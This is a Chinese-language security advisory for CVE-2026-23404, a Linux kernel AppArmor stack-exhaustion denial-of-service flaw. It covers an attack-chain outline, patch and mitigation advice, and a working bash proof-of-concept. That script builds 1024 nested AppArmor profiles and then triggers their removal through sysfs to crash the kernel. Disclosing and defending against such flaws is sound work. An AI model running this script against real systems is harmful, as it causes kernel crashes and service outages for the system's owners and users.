CVE-2026-23404 CVSS 5.5 中危

CVE-2026-23404 Linux内核AppArmor栈耗尽漏洞

披露日期: 2026-04-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23404

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的AppArmor安全模块在移除嵌套配置文件时存在漏洞，由于采用递归算法，攻击者可利用深层嵌套结构导致内核栈耗尽，进而引发系统崩溃和拒绝服务。

技术细节

该漏洞产生于AppArmor的配置文件移除逻辑。原代码使用`__aa_profile_list_release`函数进行递归删除以清理嵌套的子配置文件。由于Linux内核栈空间有限，当嵌套层级过深（如1024层）时，递归深度会超出栈容量，导致内核崩溃。攻击者可本地通过脚本循环创建嵌套配置文件，并利用sysfs接口触发移除操作。修复方案将递归逻辑替换为迭代逻辑，在`__remove_profile`中循环处理叶子节点，避免了栈溢出风险。

攻击链分析

STEP 1

步骤1：本地访问

攻击者获取本地低权限用户访问权限。

STEP 2

步骤2：构造恶意配置

执行脚本创建1024层深度嵌套的AppArmor配置文件。

STEP 3

步骤3：触发漏洞

通过向sysfs接口写入数据触发配置文件的递归移除。

STEP 4

步骤4：系统崩溃

内核栈空间耗尽，导致系统崩溃或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash

# Reproducer for CVE-2026-23404: Kernel Stack Exhaustion
# Create 1024 nested AppArmor profiles
pf='a'
for ((i=0; i<1024; i++)); do
    echo -e "profile $pf { \n }" | apparmor_parser -K -a
    pf="$pf//x"
done

# Trigger removal to exhaust kernel stack via recursion
echo -n a > /sys/kernel/security/apparmor/.remove

影响范围

Linux Kernel (具体受影响版本请参考Git补丁提交记录)

防御指南

临时缓解措施

建议立即应用官方提供的内核补丁，将递归删除逻辑替换为迭代逻辑。若无法立即升级，应严格限制本地用户对AppArmor工具和sysfs相关接口的访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表